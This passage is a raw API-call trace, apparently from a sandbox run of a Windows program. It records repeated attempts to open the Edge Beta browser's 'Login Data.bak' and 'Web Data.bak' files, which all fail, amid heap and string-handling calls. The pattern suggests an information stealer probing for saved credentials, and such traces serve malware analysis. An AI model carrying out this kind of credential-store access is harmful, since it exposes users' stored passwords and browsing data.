(in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625090 | out: hHeap=0x5f0000) returned 1 [0180.649] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x625b80, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0180.649] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb8) returned 0x621e80 [0180.649] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x621e80) returned 0xb8 [0180.649] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x625b80, cbMultiByte=-1, lpWideCharStr=0x621e80, cchWideChar=89 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Login Data.bak") returned 89 [0180.649] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\edge beta\\user data\\default\\login data.bak"), fInfoLevelId=0x0, lpFileInformation=0x5cef70 | out: lpFileInformation=0x5cef70*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.649] GetLastError () returned 0x3 [0180.649] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\edge beta\\user data\\default\\login data.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0180.650] GetLastError () returned 0x3 [0180.650] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x3, dwLanguageId=0x0, lpBuffer=0x5ced78, nSize=0x0, Arguments=0x0 | out: lpBuffer="讐a") returned 0x2c [0180.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="The system cannot find the path specified.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0180.650] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x613440 [0180.650] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613440) returned 0x30 [0180.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="The system cannot find the path specified.\r\n", cchWideChar=-1, lpMultiByteStr=0x613440, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The system cannot find the path specified.\r\n", lpUsedDefaultChar=0x0) returned 45 [0180.650] LocalFree (hMem=0x618b90) returned 0x0 [0180.650] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613440) returned 0x30 [0180.650] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.650] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x621e80) returned 0xb8 [0180.650] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x621e80 | out: hHeap=0x5f0000) returned 1 [0180.650] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x625b80, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0180.650] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb8) returned 0x621e80 [0180.650] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x621e80) returned 0xb8 [0180.650] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x625b80, cbMultiByte=-1, lpWideCharStr=0x621e80, cchWideChar=89 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Login Data.bak") returned 89 [0180.650] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\edge beta\\user data\\default\\login data.bak"), fInfoLevelId=0x0, lpFileInformation=0x5cef70 | out: lpFileInformation=0x5cef70*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.650] GetLastError () returned 0x3 [0180.650] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\edge beta\\user data\\default\\login data.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0180.650] GetLastError () returned 0x3 [0180.650] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x3, dwLanguageId=0x0, lpBuffer=0x5ced78, nSize=0x0, Arguments=0x0 | out: lpBuffer="诰a") returned 0x2c [0180.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="The system cannot find the path specified.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0180.650] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x613440 [0180.651] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613440) returned 0x30 [0180.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="The system cannot find the path specified.\r\n", cchWideChar=-1, lpMultiByteStr=0x613440, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The system cannot find the path specified.\r\n", lpUsedDefaultChar=0x0) returned 45 [0180.651] LocalFree (hMem=0x618bf0) returned 0x0 [0180.651] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613440) returned 0x30 [0180.651] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.651] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x621e80) returned 0xb8 [0180.651] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x621e80 | out: hHeap=0x5f0000) returned 1 [0180.651] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6258d0) returned 0x3d0 [0180.651] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6258d0 | out: hHeap=0x5f0000) returned 1 [0180.651] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x61c550) returned 0x88 [0180.651] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c550 | out: hHeap=0x5f0000) returned 1 [0180.651] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6200f0) returned 0x48 [0180.651] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6200f0 | out: hHeap=0x5f0000) returned 1 [0180.651] GetLastError () returned 0x3 [0180.651] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x618b30) returned 0x60 [0180.651] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618b30 | out: hHeap=0x5f0000) returned 1 [0180.651] GetProcessHeap () returned 0x5f0000 [0180.651] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2d) returned 0x613440 [0180.651] GetProcessHeap () returned 0x5f0000 [0180.651] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f350 [0180.651] lstrlenA (lpString="") returned 0 [0180.651] GetProcessHeap () returned 0x5f0000 [0180.651] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f410 [0180.651] lstrcpyA (in: lpString1=0x61f410, lpString2="" | out: lpString1="") returned="" [0180.651] GetProcessHeap () returned 0x5f0000 [0180.651] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2d) returned 0x613950 [0180.651] GetProcessHeap () returned 0x5f0000 [0180.651] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f360 [0180.652] ResetEvent (hEvent=0xc) returned 1 [0180.652] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.681] GetProcessHeap () returned 0x5f0000 [0180.681] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f360 | out: hHeap=0x5f0000) returned 1 [0180.681] GetProcessHeap () returned 0x5f0000 [0180.681] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613950 | out: hHeap=0x5f0000) returned 1 [0180.681] GetProcessHeap () returned 0x5f0000 [0180.681] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f410 | out: hHeap=0x5f0000) returned 1 [0180.681] GetProcessHeap () returned 0x5f0000 [0180.681] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f350 | out: hHeap=0x5f0000) returned 1 [0180.681] GetProcessHeap () returned 0x5f0000 [0180.681] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.681] lstrlenA (lpString="unable to open database file") returned 28 [0180.681] GetProcessHeap () returned 0x5f0000 [0180.681] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1d) returned 0x615d20 [0180.681] lstrcpyA (in: lpString1=0x615d20, lpString2="unable to open database file" | out: lpString1="unable to open database file") returned="unable to open database file" [0180.681] GetProcessHeap () returned 0x5f0000 [0180.682] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f3b0 [0180.682] lstrlenA (lpString="") returned 0 [0180.682] GetProcessHeap () returned 0x5f0000 [0180.682] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f350 [0180.682] lstrcpyA (in: lpString1=0x61f350, lpString2="" | out: lpString1="") returned="" [0180.682] GetProcessHeap () returned 0x5f0000 [0180.682] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1d) returned 0x615ea0 [0180.682] GetProcessHeap () returned 0x5f0000 [0180.682] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f280 [0180.682] ResetEvent (hEvent=0xc) returned 1 [0180.682] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.713] GetProcessHeap () returned 0x5f0000 [0180.713] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f280 | out: hHeap=0x5f0000) returned 1 [0180.713] GetProcessHeap () returned 0x5f0000 [0180.713] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.713] GetProcessHeap () returned 0x5f0000 [0180.713] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f350 | out: hHeap=0x5f0000) returned 1 [0180.713] GetProcessHeap () returned 0x5f0000 [0180.713] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3b0 | out: hHeap=0x5f0000) returned 1 [0180.713] GetProcessHeap () returned 0x5f0000 [0180.713] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d20 | out: hHeap=0x5f0000) returned 1 [0180.714] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625000) returned 0x80 [0180.714] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625000 | out: hHeap=0x5f0000) returned 1 [0180.714] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x624a20) returned 0x80 [0180.714] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624a20 | out: hHeap=0x5f0000) returned 1 [0180.714] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x611f60) returned 0x80 [0180.714] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.714] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615dc0) returned 0x20 [0180.714] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x5f0000) returned 1 [0180.714] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615f60) returned 0x20 [0180.715] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.715] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615ca0) returned 0x20 [0180.715] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.715] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613320) returned 0x30 [0180.715] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.715] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x624d50) returned 0x2a0 [0180.715] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624d50 | out: hHeap=0x5f0000) returned 1 [0180.715] GetProcessHeap () returned 0x5f0000 [0180.715] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x621040 | out: hHeap=0x5f0000) returned 1 [0180.715] GetProcessHeap () returned 0x5f0000 [0180.715] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.716] GetProcessHeap () returned 0x5f0000 [0180.716] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1b) returned 0x615ca0 [0180.716] GetProcessHeap () returned 0x5f0000 [0180.716] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1b) returned 0x615d20 [0180.716] GetProcessHeap () returned 0x5f0000 [0180.716] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f280 [0180.716] lstrlenA (lpString="") returned 0 [0180.716] GetProcessHeap () returned 0x5f0000 [0180.716] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f410 [0180.716] lstrcpyA (in: lpString1=0x61f410, lpString2="" | out: lpString1="") returned="" [0180.716] GetProcessHeap () returned 0x5f0000 [0180.716] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1b) returned 0x615ea0 [0180.716] GetProcessHeap () returned 0x5f0000 [0180.716] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f3b0 [0180.717] ResetEvent (hEvent=0xc) returned 1 [0180.717] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.728] GetProcessHeap () returned 0x5f0000 [0180.728] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3b0 | out: hHeap=0x5f0000) returned 1 [0180.728] GetProcessHeap () returned 0x5f0000 [0180.728] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.728] GetProcessHeap () returned 0x5f0000 [0180.728] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f410 | out: hHeap=0x5f0000) returned 1 [0180.728] GetProcessHeap () returned 0x5f0000 [0180.728] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f280 | out: hHeap=0x5f0000) returned 1 [0180.728] GetProcessHeap () returned 0x5f0000 [0180.728] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d20 | out: hHeap=0x5f0000) returned 1 [0180.728] GetProcessHeap () returned 0x5f0000 [0180.728] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.728] GetProcessHeap () returned 0x5f0000 [0180.728] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f350 [0180.728] GetProcessHeap () returned 0x5f0000 [0180.728] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f360 [0180.728] GetProcessHeap () returned 0x5f0000 [0180.728] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f410 [0180.728] GetProcessHeap () returned 0x5f0000 [0180.728] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f280 [0180.728] GetProcessHeap () returned 0x5f0000 [0180.728] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3b0 [0180.728] GetProcessHeap () returned 0x5f0000 [0180.728] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ce0 [0180.728] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.728] GetProcessHeap () returned 0x5f0000 [0180.728] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ce0 | out: hHeap=0x5f0000) returned 1 [0180.728] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cf540, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.728] GetProcessHeap () returned 0x5f0000 [0180.729] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f3c0 [0180.729] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.729] GetProcessHeap () returned 0x5f0000 [0180.729] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.729] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.729] GetProcessHeap () returned 0x5f0000 [0180.729] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.729] GetProcessHeap () returned 0x5f0000 [0180.729] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x95) returned 0x611f60 [0180.729] GetProcessHeap () returned 0x5f0000 [0180.729] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4b) returned 0x620140 [0180.729] GetProcessHeap () returned 0x5f0000 [0180.729] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620140, Size=0xa5) returned 0x624900 [0180.729] GetProcessHeap () returned 0x5f0000 [0180.729] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x53) returned 0x618470 [0180.729] GetProcessHeap () returned 0x5f0000 [0180.729] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x618470, Size=0xad) returned 0x6249c0 [0180.729] GetProcessHeap () returned 0x5f0000 [0180.729] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f3b0, Size=0x57) returned 0x618b30 [0180.729] GetProcessHeap () returned 0x5f0000 [0180.729] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6249c0 | out: hHeap=0x5f0000) returned 1 [0180.729] GetProcessHeap () returned 0x5f0000 [0180.729] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.729] GetProcessHeap () returned 0x5f0000 [0180.729] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.729] GetProcessHeap () returned 0x5f0000 [0180.729] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.729] GetProcessHeap () returned 0x5f0000 [0180.729] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0180.729] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.729] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Web Data.bak") returned 0 [0180.730] GetProcessHeap () returned 0x5f0000 [0180.730] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618b30 | out: hHeap=0x5f0000) returned 1 [0180.730] GetProcessHeap () returned 0x5f0000 [0180.730] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f280 | out: hHeap=0x5f0000) returned 1 [0180.730] GetProcessHeap () returned 0x5f0000 [0180.730] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1f) returned 0x615ea0 [0180.730] GetProcessHeap () returned 0x5f0000 [0180.730] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1f) returned 0x615f60 [0180.730] GetProcessHeap () returned 0x5f0000 [0180.730] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f280 [0180.730] lstrlenA (lpString="") returned 0 [0180.730] GetProcessHeap () returned 0x5f0000 [0180.730] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3b0 [0180.730] lstrcpyA (in: lpString1=0x61f3b0, lpString2="" | out: lpString1="") returned="" [0180.730] GetProcessHeap () returned 0x5f0000 [0180.730] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1f) returned 0x615ca0 [0180.730] GetProcessHeap () returned 0x5f0000 [0180.730] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f3c0 [0180.730] ResetEvent (hEvent=0xc) returned 1 [0180.730] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.767] GetProcessHeap () returned 0x5f0000 [0180.767] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0180.767] GetProcessHeap () returned 0x5f0000 [0180.767] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.767] GetProcessHeap () returned 0x5f0000 [0180.767] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3b0 | out: hHeap=0x5f0000) returned 1 [0180.767] GetProcessHeap () returned 0x5f0000 [0180.767] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f280 | out: hHeap=0x5f0000) returned 1 [0180.767] GetProcessHeap () returned 0x5f0000 [0180.767] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.767] GetProcessHeap () returned 0x5f0000 [0180.767] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.767] GetProcessHeap () returned 0x5f0000 [0180.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f280 [0180.767] GetProcessHeap () returned 0x5f0000 [0180.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ea0 [0180.767] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.767] GetProcessHeap () returned 0x5f0000 [0180.767] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.767] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cf590, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.767] GetProcessHeap () returned 0x5f0000 [0180.767] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f3b0 [0180.768] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.768] GetProcessHeap () returned 0x5f0000 [0180.768] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.768] lstrcpyA (in: lpString1=0x613440, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.768] GetProcessHeap () returned 0x5f0000 [0180.768] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.768] GetProcessHeap () returned 0x5f0000 [0180.768] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x95) returned 0x611f60 [0180.768] GetProcessHeap () returned 0x5f0000 [0180.768] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4b) returned 0x620280 [0180.768] GetProcessHeap () returned 0x5f0000 [0180.768] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620280, Size=0xa5) returned 0x624900 [0180.768] GetProcessHeap () returned 0x5f0000 [0180.768] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x53) returned 0x6180b0 [0180.768] GetProcessHeap () returned 0x5f0000 [0180.768] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6180b0, Size=0xad) returned 0x6249c0 [0180.768] GetProcessHeap () returned 0x5f0000 [0180.768] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f280, Size=0x57) returned 0x618890 [0180.768] GetProcessHeap () returned 0x5f0000 [0180.768] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6249c0 | out: hHeap=0x5f0000) returned 1 [0180.768] GetProcessHeap () returned 0x5f0000 [0180.768] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.768] GetProcessHeap () returned 0x5f0000 [0180.768] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.768] GetProcessHeap () returned 0x5f0000 [0180.768] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.768] GetProcessHeap () returned 0x5f0000 [0180.768] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3b0 | out: hHeap=0x5f0000) returned 1 [0180.769] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.769] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Web Data.bak") returned 0 [0180.769] GetProcessHeap () returned 0x5f0000 [0180.769] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618890 | out: hHeap=0x5f0000) returned 1 [0180.769] GetProcessHeap () returned 0x5f0000 [0180.769] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613440 [0180.769] GetProcessHeap () returned 0x5f0000 [0180.769] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613320 [0180.769] GetProcessHeap () returned 0x5f0000 [0180.769] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f3c0 [0180.769] lstrlenA (lpString="") returned 0 [0180.769] GetProcessHeap () returned 0x5f0000 [0180.769] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3b0 [0180.769] lstrcpyA (in: lpString1=0x61f3b0, lpString2="" | out: lpString1="") returned="" [0180.769] GetProcessHeap () returned 